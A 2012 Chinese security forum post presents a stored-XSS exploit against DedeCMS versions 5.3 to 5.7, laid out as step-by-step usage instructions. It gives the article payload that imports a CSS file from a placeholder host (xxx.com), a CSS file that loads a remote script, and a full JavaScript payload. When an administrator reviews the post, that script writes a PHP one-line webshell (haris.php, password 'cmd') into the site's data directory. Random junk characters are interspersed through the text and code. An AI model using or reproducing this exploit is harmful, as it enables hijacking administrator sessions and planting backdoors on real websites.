找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1793|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
; v( L- O2 [$ Z/ {8 n- \$ ~为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)! M! i& n+ `5 j2 E
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
  `, O! }0 E$ x# I5 X1 ]下面说说利用方法。
6 K+ W8 v! _3 B条件有2个:1 {6 Q+ \7 A6 D$ w+ U7 o0 A
1.开启注册
3 L+ O( E! i& f5 [  r6 _5 p2.开启投稿4 P1 X6 l6 q1 z) D! n" F
注册会员----发表文章/ s6 u* @3 k9 Z2 ^
内容填写:2 r/ P5 s: j9 n3 S
复制代码9 z7 V+ e4 Q5 d$ t$ l& l
<style>@im\port'\http://xxx.com/xss.css';</style>
* X! a6 L6 t0 l! L新建XSS.Css
- K* [- R+ N& V复制代码- L+ l7 M. S) m5 \8 d; G7 e) B
.body{# p( `6 I. H( \+ R* [' g+ p/ P
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }- @( I, y0 W3 b& L) V
新建xss.js 内容为
( B. g' @  U0 K复制代码
# O6 l6 c$ `5 o  d  w1.var request = false;2 M) X3 u1 p1 [
2.if(window.XMLHttpRequest) {
( H/ l4 J0 Z- {0 n1 i3.request = new XMLHttpRequest();5 C( k8 B4 p6 h, J
4.if(request.overrideMimeType) {! q1 p# p  K' A
5.request.overrideMimeType('text/xml');* g$ G; m) b# ^: J8 E
6.}
# {; ]+ a8 h/ T" U4 d; L7.} else if(window.ActiveXObject) {
0 Y$ Z% K) f1 J( U+ X8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];6 z8 T% @; F7 g: ]7 ~
9.for(var i=0; i<versions.length; i++) {
( r7 o6 {$ X2 ?: Q# y' m10.try {: ]" t, I6 Y3 C2 `: Z+ h
11.request = new ActiveXObject(versions);
( C2 C3 J9 @5 u& E12.} catch(e) {}) I, J' P- T& C/ a% k% Z* m
13.}: a$ X2 Z% i) S. y% G/ f
14.}
  {5 A4 d3 q( U& d15.xmlhttp=request;
2 \2 e& b2 s7 Q6 e: c16.function getFolder( url ){& j  L" F# G9 I' J! l. u! D! V3 e; y
17. obj = url.split('/')
" c4 t: \$ U6 y' c4 l18. return obj[obj.length-2]
0 i* k( |% l! u8 t19.}. X* P, }' a; @% |, U3 T
20.oUrl = top.location.href;# q6 b; t+ i$ J6 |1 P! m6 N2 o
21.u = getFolder(oUrl);- i$ X0 z7 a; B3 X3 H
22.add_admin();( c; G3 ^& l$ c) j$ D! c3 W
23.function add_admin(){
9 \; I: s' S" _; a24.var url= "/"+u+"/sys_sql_query.php";1 }0 v; p! F: Q$ B; a: P/ T% u' `
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
- @! @3 t3 B' S26.xmlhttp.open("POST", url, true);
+ ^+ d9 m7 G" }9 a# F27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");7 y9 o8 c. n" v- k) T- w
28.xmlhttp.setRequestHeader("Content-length", params.length);% D! Y  I: W2 P- ]
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
* J8 K' Z, h, v! n# _5 x$ r0 E30.xmlhttp.send(params);
  q: s7 l0 t% o4 e1 ]$ S! c/ }31.}
- ~4 m# H: [- ~& w6 |/ k+ ~1 U当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表